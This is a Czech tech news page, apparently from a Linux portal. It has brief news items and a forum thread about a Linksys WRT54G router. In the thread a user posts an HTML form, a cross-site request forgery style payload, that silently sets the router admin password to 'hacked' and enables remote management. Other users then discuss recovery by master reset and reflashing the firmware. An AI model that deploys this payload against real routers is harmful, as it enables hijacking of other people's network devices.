Byl publikován aktuální přehled vývoje renderovacího jádra webového prohlížeče Servo (Wikipedie).
V programovacím jazyce Go naprogramovaná webová aplikace pro spolupráci na zdrojových kódech pomocí gitu Forgejo byla vydána ve verzi 12.0 (Mastodon). Forgejo je fork Gitei.
Nová čísla časopisů od nakladatelství Raspberry Pi zdarma ke čtení: Raspberry Pi Official Magazine 155 (pdf) a Hello World 27 (pdf).
Hyprland, tj. kompozitor pro Wayland zaměřený na dláždění okny a zároveň grafické efekty, byl vydán ve verzi 0.50.0. Podrobný přehled novinek na GitHubu.
Patrick Volkerding oznámil před dvaatřiceti lety vydání Slackware Linuxu 1.00. Slackware Linux byl tenkrát k dispozici na 3,5 palcových disketách. Základní systém byl na 13 disketách. Kdo chtěl grafiku, potřeboval dalších 11 disket. Slackware Linux 1.00 byl postaven na Linuxu .99pl11 Alpha, libc 4.4.1, g++ 2.4.5 a XFree86 1.3.
Ministerstvo pro místní rozvoj (MMR) jako první orgán státní správy v Česku spustilo takzvaný „bug bounty“ program pro odhalování bezpečnostních rizik a zranitelných míst ve svých informačních systémech. Za nalezení kritické zranitelnosti nabízí veřejnosti odměnu 1000 eur, v případě vysoké závažnosti je to 500 eur. Program se inspiruje přístupy běžnými v komerčním sektoru nebo ve veřejné sféře v zahraničí.
Vláda dne 16. července 2025 schválila návrh nového jednotného vizuálního stylu státní správy. Vytvořilo jej na základě veřejné soutěže studio Najbrt. Náklady na přípravu návrhu a metodiky činily tři miliony korun. Modernizovaný dvouocasý lev vychází z malého státního znaku. Vizuální styl doprovází originální písmo Czechia Sans.
Vyhledávač DuckDuckGo je podle webu DownDetector od 2:15 SELČ nedostupný. Opět fungovat začal na několik minut zhruba v 15:15. Další služby nesouvisející přímo s vyhledáváním, jako mapy a AI asistent jsou dostupné. Pro některé dotazy během výpadku stále funguje zobrazování například textu z Wikipedie.
Více než 600 aplikací postavených na PHP frameworku Laravel je zranitelných vůči vzdálenému spuštění libovolného kódu. Útočníci mohou zneužít veřejně uniklé konfigurační klíče APP_KEY (např. z GitHubu). Z více než 260 000 APP_KEY získaných z GitHubu bylo ověřeno, že přes 600 aplikací je zranitelných. Zhruba 63 % úniků pochází z .env souborů, které často obsahují i další citlivé údaje (např. přístupové údaje k databázím nebo cloudovým službám).
Open source modální textový editor Helix, inspirovaný editory Vim, Neovim či Kakoune, byl vydán ve verzi 25.07. Přehled novinek se záznamy terminálových sezení v asciinema v oznámení na webu. Detailně v CHANGELOGu na GitHubu.
<\form method="post" action="http://192.168.2.1/manage.tri">
<\input type="hidden" name="remote_mgt_https" value="0">
<\input type="hidden" name="http_enable" value="1">
<\input type="hidden" name="https_enable" value="0">
<\input type="hidden" name="PasswdModify" value="1">
<\input type="hidden" name="http_passwd" value="hacked">
<\input type="hidden" name="http_passwdConfirm" value="hacked">
<\input type="hidden" name="_http_enable" value="1">
<\input type="hidden" name="web_wl_filter" value="1">
<\input type="hidden" name="remote_management" value="0">
<\input type="hidden" name="upnp_enable" value="1">
<\input type="hidden" name="layout" value="en">
<\input type="submit">
<\/form>
Tento html kod zmeni master pasword na "hacked". Neveril jsem tomu, a hle, ono se to povedlo. Do administrace me to pustilo pod novým heslem. Neveril jsem tomu. Musel jsem vse vyzkouset jeste jednou. Jenze po druhem pokusu na routeru spadla cela sluzba pro HTTP a uz neslo jit vubec do webove administrace. Ani po vypnuti a zapnuti routeru http nenaskoci. Bojim se router vyresetovat uplne, protoze si myslim, ze se akorat vyresetuje konfigurace a http stejne nenaskoci. Router by pak byl uz uplne nepouzitelny. Krome http na routeru funguje zatim vsechno a sit je normalne funkcni - jen proste nejde zmenit jakoukoliv konfiguraci.
Řešení dotazu:
Ahoj, myslím že nejlepší by bylo udělat master reset a nahrát poslední "Firmware Version: v7.00.4"
Vlastním také WRT54G a http normálně do internetu otevřené nemám, ale jednou jsem ho potřeboval konfigurovat vzdáleně a tak jsem to na pár dní otevřel. Když jsem se pak chtěl připojit, tak to na http nedalo ani přihlašovací okno. Restart nepomohl, tak jsem udělal master reset, ten pomohl. Pokusil jsem se nahrát poslední firmware 7.00.4 to ale z neznámého důvodu nedopadlo a WRT byl v háji. Až nakonec po různých kombinacích zapnutí vypnutí a resetů se router rozjel a po připojení na http se objevilo okénko kde jediné co se dalo dělat byl upgrade firmware. Tak jsem ho tam znovu nahrál, tentokrát to dopadlo OK a router chodí.
Ja ("nastesti" - ono jak kdy ), primo do internetu pripojen nejsem. Jsem kryty jeste jednim routerem, takze o bezpecnost obavy tolik nemam. Asi pujdu na ten master reset, uvidime jestli naskoci. Pak sem dam vedet jak to dopadlo. Uz nevim jiste jestli jsem mel zupgradovano na 7.004, ale urcite to kdyztak napravim (jestli bude jeste moznost to napravit
).
Tiskni
Sdílej: